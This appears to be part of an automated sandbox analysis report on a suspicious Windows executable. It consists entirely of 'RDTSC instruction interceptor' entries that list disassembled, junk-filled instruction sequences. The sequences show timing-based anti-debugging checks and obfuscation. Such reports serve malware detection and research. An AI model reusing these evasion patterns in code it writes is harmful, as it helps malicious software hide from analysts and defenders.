Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA53F4 second address: AA541C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F98991A2762h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA541C second address: AA544F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF1h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jl 00007F9899183FE6h 0x00000015 jmp 00007F9899183FF0h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA544F second address: AA5457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA709B second address: AA70AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9899183FE6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA70AA second address: AA70B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA70B0 second address: AA70B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA70B4 second address: AA70B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 981A1D second address: 981A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 981A21 second address: 981A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 981A27 second address: 981A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F9899183FE6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0514 second address: 4DB051A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB051A second address: 4DB051E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB051E second address: 4DB0522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0522 second address: 4DB0567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9899183FF3h 0x00000012 sub ecx, 49FF3F2Eh 0x00000018 jmp 00007F9899183FF9h 0x0000001d popfd 0x0000001e mov si, 3DB7h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0567 second address: 4DB0588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98991A275Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0588 second address: 4DB0472 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [74E5188Ch] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 push ecx 0x00000015 mov ecx, dword ptr [7FFE0004h] 0x0000001b mov dword ptr [ebp-04h], ecx 0x0000001e cmp ecx, 01000000h 0x00000024 jc 00007F98991B5AC5h 0x0000002a mov eax, 7FFE0320h 0x0000002f mov eax, dword ptr [eax] 0x00000031 mul ecx 0x00000033 shrd eax, edx, 00000018h 0x00000037 mov esp, ebp 0x00000039 pop ebp 0x0000003a ret 0x0000003b jmp 00007F9899183FEEh 0x00000040 pop ecx 0x00000041 jmp 00007F9899183FF0h 0x00000046 ret 0x00000047 nop 0x00000048 xor esi, eax 0x0000004a lea eax, dword ptr [ebp-10h] 0x0000004d push eax 0x0000004e call 00007F989DB30EA9h 0x00000053 mov edi, edi 0x00000055 jmp 00007F9899183FF7h 0x0000005a xchg eax, ebp 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0472 second address: 4DB0476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0476 second address: 4DB047A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB047A second address: 4DB0480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0480 second address: 4DB04C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 movzx esi, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F9899183FEEh 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F9899183FF0h 0x00000017 mov ebp, esp 0x00000019 jmp 00007F9899183FF0h 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB04C4 second address: 4DB04C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB04C8 second address: 4DB04E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB04E5 second address: 4DB04EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6000A second address: 4D600A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, FF74h 0x00000007 mov al, bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F9899183FF4h 0x00000012 push eax 0x00000013 pushad 0x00000014 push edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F9899183FF9h 0x0000001c add cl, 00000046h 0x0000001f jmp 00007F9899183FF1h 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 jmp 00007F9899183FECh 0x0000002d mov dh, al 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 jmp 00007F9899183FEDh 0x00000037 mov eax, dword ptr fs:[00000030h] 0x0000003d pushad 0x0000003e mov ax, 5873h 0x00000042 mov si, 08CFh 0x00000046 popad 0x00000047 sub esp, 18h 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d call 00007F9899183FEEh 0x00000052 pop ecx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D600A4 second address: 4D600F6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F98991A275Bh 0x00000008 xor cx, D28Eh 0x0000000d jmp 00007F98991A2769h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F98991A275Eh 0x0000001d or eax, 000C1D08h 0x00000023 jmp 00007F98991A275Bh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D600F6 second address: 4D6019D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9899183FF8h 0x00000008 sub ax, BF68h 0x0000000d jmp 00007F9899183FEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F9899183FF4h 0x0000001e adc al, FFFFFFC8h 0x00000021 jmp 00007F9899183FEBh 0x00000026 popfd 0x00000027 mov ah, 8Bh 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F9899183FF2h 0x00000030 xchg eax, ebx 0x00000031 jmp 00007F9899183FF0h 0x00000036 mov ebx, dword ptr [eax+10h] 0x00000039 jmp 00007F9899183FF0h 0x0000003e xchg eax, esi 0x0000003f jmp 00007F9899183FF0h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6019D second address: 4D601B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2768h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D601B9 second address: 4D6020F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007F9899183FF4h 0x00000010 pushfd 0x00000011 jmp 00007F9899183FF2h 0x00000016 and cx, FDA8h 0x0000001b jmp 00007F9899183FEBh 0x00000020 popfd 0x00000021 popad 0x00000022 mov esi, dword ptr [74E806ECh] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6020F second address: 4D60215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60215 second address: 4D6022E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop esi 0x00000010 mov si, bx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6022E second address: 4D60291 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F98991A35AEh 0x0000000f jmp 00007F98991A2760h 0x00000014 xchg eax, edi 0x00000015 jmp 00007F98991A2760h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F98991A275Ch 0x00000024 xor ecx, 1F378FF8h 0x0000002a jmp 00007F98991A275Bh 0x0000002f popfd 0x00000030 push ecx 0x00000031 pop edx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60291 second address: 4D602C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov bh, ch 0x0000000d mov esi, edi 0x0000000f popad 0x00000010 call dword ptr [74E50B60h] 0x00000016 mov eax, 750BE5E0h 0x0000001b ret 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F9899183FEEh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D602C7 second address: 4D6033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000044h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F98991A2765h 0x00000012 or cx, D756h 0x00000017 jmp 00007F98991A2761h 0x0000001c popfd 0x0000001d mov bx, si 0x00000020 popad 0x00000021 pop edi 0x00000022 pushad 0x00000023 mov ebx, ecx 0x00000025 mov dl, al 0x00000027 popad 0x00000028 push ecx 0x00000029 pushad 0x0000002a jmp 00007F98991A275Ah 0x0000002f jmp 00007F98991A2762h 0x00000034 popad 0x00000035 mov dword ptr [esp], edi 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F98991A275Ah 0x00000041 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6033B second address: 4D60341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D603ED second address: 4D603F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D603F3 second address: 4D603F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D603F7 second address: 4D60484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F98991A2769h 0x0000000f je 00007F99092419E4h 0x00000015 jmp 00007F98991A275Eh 0x0000001a sub eax, eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F98991A2767h 0x00000023 adc al, FFFFFF8Eh 0x00000026 jmp 00007F98991A2769h 0x0000002b popfd 0x0000002c movzx eax, di 0x0000002f popad 0x00000030 mov dword ptr [esi], edi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F98991A2766h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60484 second address: 4D604C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F9899183FEBh 0x00000015 xor ecx, 5516D6FEh 0x0000001b jmp 00007F9899183FF9h 0x00000020 popfd 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D604C8 second address: 4D604CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D604CE second address: 4D604D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D604D2 second address: 4D60554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F98991A275Bh 0x00000012 or eax, 53BBE90Eh 0x00000018 jmp 00007F98991A2769h 0x0000001d popfd 0x0000001e mov ebx, esi 0x00000020 popad 0x00000021 mov dword ptr [esi+0Ch], eax 0x00000024 pushad 0x00000025 pushad 0x00000026 push esi 0x00000027 pop edx 0x00000028 mov bx, si 0x0000002b popad 0x0000002c pushfd 0x0000002d jmp 00007F98991A275Eh 0x00000032 adc eax, 43301AB8h 0x00000038 jmp 00007F98991A275Bh 0x0000003d popfd 0x0000003e popad 0x0000003f mov eax, dword ptr [ebx+4Ch] 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F98991A2765h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60554 second address: 4D60564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9899183FECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60564 second address: 4D605B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+10h], eax 0x0000000e jmp 00007F98991A2766h 0x00000013 mov eax, dword ptr [ebx+50h] 0x00000016 jmp 00007F98991A2760h 0x0000001b mov dword ptr [esi+14h], eax 0x0000001e pushad 0x0000001f mov cl, 3Fh 0x00000021 movsx ebx, cx 0x00000024 popad 0x00000025 mov eax, dword ptr [ebx+54h] 0x00000028 pushad 0x00000029 mov cx, 4A87h 0x0000002d push eax 0x0000002e push edx 0x0000002f push esi 0x00000030 pop edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D605B7 second address: 4D6063F instructions: 0x00000000 rdtsc 0x00000002 mov cl, EBh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+18h], eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9899183FF7h 0x00000011 sbb ax, C1FEh 0x00000016 jmp 00007F9899183FF9h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F9899183FF0h 0x00000022 and esi, 76A9C8F8h 0x00000028 jmp 00007F9899183FEBh 0x0000002d popfd 0x0000002e popad 0x0000002f mov eax, dword ptr [ebx+58h] 0x00000032 jmp 00007F9899183FF6h 0x00000037 mov dword ptr [esi+1Ch], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6063F second address: 4D60645 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60645 second address: 4D606A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c jmp 00007F9899183FF0h 0x00000011 mov dword ptr [esi+20h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F9899183FEDh 0x0000001d sub ecx, 05A2B856h 0x00000023 jmp 00007F9899183FF1h 0x00000028 popfd 0x00000029 mov cx, ADC7h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D606A1 second address: 4D606F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F98991A2763h 0x00000009 xor ecx, 3E49A98Eh 0x0000000f jmp 00007F98991A2769h 0x00000014 popfd 0x00000015 mov edi, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+60h] 0x0000001d jmp 00007F98991A275Ah 0x00000022 mov dword ptr [esi+24h], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D606F2 second address: 4D60727 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9899183FF8h 0x00000008 and eax, 13D7DE68h 0x0000000e jmp 00007F9899183FEBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 mov dx, si 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60727 second address: 4D60775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+64h] 0x00000009 pushad 0x0000000a mov dl, al 0x0000000c pushfd 0x0000000d jmp 00007F98991A2769h 0x00000012 xor ah, 00000036h 0x00000015 jmp 00007F98991A2761h 0x0000001a popfd 0x0000001b popad 0x0000001c mov dword ptr [esi+28h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F98991A275Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60775 second address: 4D60789 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+68h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60789 second address: 4D6078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6078D second address: 4D6079D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6079D second address: 4D607FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F98991A275Dh 0x00000009 adc cx, 24A6h 0x0000000e jmp 00007F98991A2761h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esi+2Ch], eax 0x0000001a pushad 0x0000001b jmp 00007F98991A275Ch 0x00000020 mov ecx, 459310E1h 0x00000025 popad 0x00000026 mov ax, word ptr [ebx+6Ch] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F98991A2766h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D607FC second address: 4D60802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60802 second address: 4D60813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98991A275Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60813 second address: 4D6083D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+30h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9899183FEDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6083D second address: 4D6086D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov eax, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ax, word ptr [ebx+00000088h] 0x00000011 jmp 00007F98991A2765h 0x00000016 mov word ptr [esi+32h], ax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6086D second address: 4D60871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60871 second address: 4D60877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60877 second address: 4D608B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F9899183FECh 0x0000000b or ah, FFFFFFF8h 0x0000000e jmp 00007F9899183FEBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [ebx+0000008Ch] 0x0000001d pushad 0x0000001e mov bl, ah 0x00000020 mov edi, 592E5CD4h 0x00000025 popad 0x00000026 mov dword ptr [esi+34h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov dx, si 0x0000002f mov eax, 15FCA317h 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D608B9 second address: 4D608D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98991A2768h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D608D5 second address: 4D608D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D608D9 second address: 4D60983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b jmp 00007F98991A2767h 0x00000010 mov dword ptr [esi+38h], eax 0x00000013 pushad 0x00000014 jmp 00007F98991A2764h 0x00000019 mov ebx, ecx 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+1Ch] 0x0000001f pushad 0x00000020 mov edx, eax 0x00000022 call 00007F98991A2766h 0x00000027 mov cx, 6AC1h 0x0000002b pop ecx 0x0000002c popad 0x0000002d mov dword ptr [esi+3Ch], eax 0x00000030 jmp 00007F98991A275Dh 0x00000035 mov eax, dword ptr [ebx+20h] 0x00000038 pushad 0x00000039 call 00007F98991A275Ch 0x0000003e pushfd 0x0000003f jmp 00007F98991A2762h 0x00000044 or esi, 1B365D38h 0x0000004a jmp 00007F98991A275Bh 0x0000004f popfd 0x00000050 pop eax 0x00000051 pushad 0x00000052 push ebx 0x00000053 pop esi 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
